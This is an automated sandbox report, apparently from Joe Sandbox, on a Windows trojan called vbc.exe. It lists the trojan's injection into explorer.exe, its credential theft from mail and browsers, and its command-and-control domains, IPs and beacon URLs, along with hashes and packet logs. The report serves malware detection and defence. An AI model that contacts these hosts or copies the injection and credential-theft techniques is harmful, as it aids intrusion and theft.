        Remote System Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer114
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
        Deobfuscate/Decode Files or Information        		LSA Secrets13
        System Information Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common3
        Obfuscated Files or Information        		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items13
        Software Packing        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        File Deletion        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680447 Sample: vbc.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 27 www.claudianavarro.online 2->27 29 claudianavarro.online 2->29 37 Malicious sample detected (through community Yara rule) 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Yara detected AntiVM3 2->41 43 5 other signatures 2->43 9 vbc.exe 3 2->9         started        signatures3 process4 file5 25 C:\Users\user\AppData\Local\...\vbc.exe.log, ASCII 9->25 dropped 55 Injects a PE file into a foreign processes 9->55 13 vbc.exe 9->13         started        16 vbc.exe 9->16         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 18 explorer.exe 13->18 injected process9 dnsIp10 31 www.funwave.info 103.141.97.24, 49796, 80 VECTANTARTERIANetworksCorporationJP Japan 18->31 33 reprograme-se10x.com 108.167.169.56, 49798, 49799, 80 UNIFIEDLAYER-AS-1US United States 18->33 35 3 other IPs or domains 18->35 45 System process connects to network (likely due to code injection or exploit) 18->45 22 control.exe 13 18->22         started        signatures11 process12 signatures13 47 Tries to steal Mail credentials (via file / registry access) 22->47 49 Tries to harvest and steal browser information (history, passwords, etc) 22->49 51 Deletes itself after installation 22->51 53 2 other signatures 22->53

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        vbc.exe32%ReversingLabsWin32.Trojan.Pwsx
        vbc.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        6.0.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        www.reliabenefitssupport.com/etn4/0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf0%Avira URL Cloudsafe
        http://www.reprograme-se10x.com/etn4/0%Avira URL Cloudsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB0%Avira URL Cloudsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj0%Avira URL Cloudsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.tadeumilhosrp.com/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ0%Avira URL Cloudsafe
        http://nginx.net/0%Avira URL Cloudsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.fontbureau.coma/0%Avira URL Cloudsafe
        http://www.sajatypeworks.comtpuKK0%Avira URL Cloudsafe
        http://www.funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://www.tadeumilhosrp.com/etn4/0%Avira URL Cloudsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        tadeumilhosrp.com
        		192.185.131.238
        		truetrue
          		unknown
          reprograme-se10x.com
          		108.167.169.56
          		truetrue
            		unknown
            www.funwave.info
            		103.141.97.24
            		truetrue
              		unknown
              claudianavarro.online
              		92.249.45.183
              		truefalse
                		unknown
                www.tadeumilhosrp.com
                		unknown
                		unknowntrue
                  		unknown
                  www.claudianavarro.online
                  		unknown
                  		unknowntrue
                    		unknown
                    www.reprograme-se10x.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      www.reliabenefitssupport.com/etn4/true
                      • Avira URL Cloud: safe
                      		low
                      http://www.reprograme-se10x.com/etn4/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXBtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tadeumilhosrp.com/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvEtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.tadeumilhosrp.com/etn4/true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bThevbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyufcontrol.exe, 0000000D.00000002.645614968.0000000005496000.00000004.10000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designers?vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.tiro.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLjcontrol.exe, 0000000D.00000002.645688479.0000000005592000.00000004.10000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cThevbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://nginx.net/control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://fontfabrik.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservicontrol.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers/frere-jones.htmlvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.coma/vbc.exe, 00000000.00000002.406494401.0000000001037000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://fedoraproject.org/control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://www.sajatypeworks.comtpuKKvbc.exe, 00000000.00000003.367848176.000000000103D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleasevbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fonts.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.urwpp.deDPleasevbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comvbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                103.141.97.24
                                                		www.funwave.infoJapan2519VECTANTARTERIANetworksCorporationJPtrue
                                                192.185.131.238
                                                		tadeumilhosrp.comUnited States
                                                		46606UNIFIEDLAYER-AS-1UStrue
                                                108.167.169.56
                                                		reprograme-se10x.comUnited States
                                                		46606UNIFIEDLAYER-AS-1UStrue

                                                General Information

                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680447
                                                Start date and time: 08/08/202216:08:122022-08-08 16:08:12 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 55s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:vbc.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:21
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@6/2@4/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 100% (good quality ratio 87.4%)
                                                • Quality average: 71.9%
                                                • Quality standard deviation: 33.1%
                                                HCA Information:
                                                • Successful, ratio: 94%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 40.125.122.176, 20.54.89.106, 52.242.101.226, 20.223.24.244, 52.152.110.14
                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                16:09:32API Interceptor2x Sleep call for process: vbc.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\vbc.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                C:\Users\user\AppData\Local\Temp\4-9E1JJI

                                                Download File
                                                Process:C:\Windows\SysWOW64\control.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.792852251086831
                                                Encrypted:false
                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.770445517790858
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:vbc.exe
                                                File size:794112
                                                MD5:ba5fa6ee78fe62b57ce7947f6bdb86ff
                                                SHA1:f8409167b9b3e09f390c28cbcebfbec670af16de
                                                SHA256:c2073d015c278a0816ca4ae0a19892874782517dd5133a112ca1f57d44f754fb
                                                SHA512:30649250ca8c07fbfd53c7d343beacec91cad8535e773e3d8b97aef3a678a981fbb6ab5646318d890303fb643938c78152cbe8774230591b4660102677545d35
                                                SSDEEP:12288:rFxgV2iNq+1MMUOS1BuMU0WthpYCXB4eAwRXIbUDbLDuXk:rFxgV10PqMeQe9IbUDHDl
                                                TLSH:C4F4BE1BAF147308C9A76AB5EE4BB9A267F71C1D3135D0783E557C4A4AFF301E52202A
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P..b..............0..............4... ...@....@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x4c34ce
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x62F0E250 [Mon Aug 8 10:15:44 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xc347c0x4f.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x388.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc60000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000xc14d40xc1600False0.810875131302521data7.777091407724558IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0xc40000x3880x400False0.369140625data2.842876085485628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xc60000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_VERSION0xc40580x32cdata

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 16:11:09.173535109 CEST4979680192.168.2.6103.141.97.24
                                                Aug 8, 2022 16:11:09.451756954 CEST8049796103.141.97.24192.168.2.6
                                                Aug 8, 2022 16:11:09.451920033 CEST4979680192.168.2.6103.141.97.24
                                                Aug 8, 2022 16:11:09.452039003 CEST4979680192.168.2.6103.141.97.24
                                                Aug 8, 2022 16:11:09.730171919 CEST8049796103.141.97.24192.168.2.6
                                                Aug 8, 2022 16:11:09.803188086 CEST8049796103.141.97.24192.168.2.6
                                                Aug 8, 2022 16:11:09.803208113 CEST8049796103.141.97.24192.168.2.6
                                                Aug 8, 2022 16:11:09.803415060 CEST4979680192.168.2.6103.141.97.24
                                                Aug 8, 2022 16:11:09.931919098 CEST4979680192.168.2.6103.141.97.24
                                                Aug 8, 2022 16:11:10.210040092 CEST8049796103.141.97.24192.168.2.6
                                                Aug 8, 2022 16:11:19.985485077 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.130086899 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.130928040 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.131123066 CEST4979880192.168.2.6108.167.169.56
                                                Aug 8, 2022 16:11:20.275513887 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450714111 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450750113 CEST8049798108.167.169.56192.168.2.6
                                                Aug 8, 2022 16:11:20.450776100 CEST8049798108.167.169.56192.168.2.6
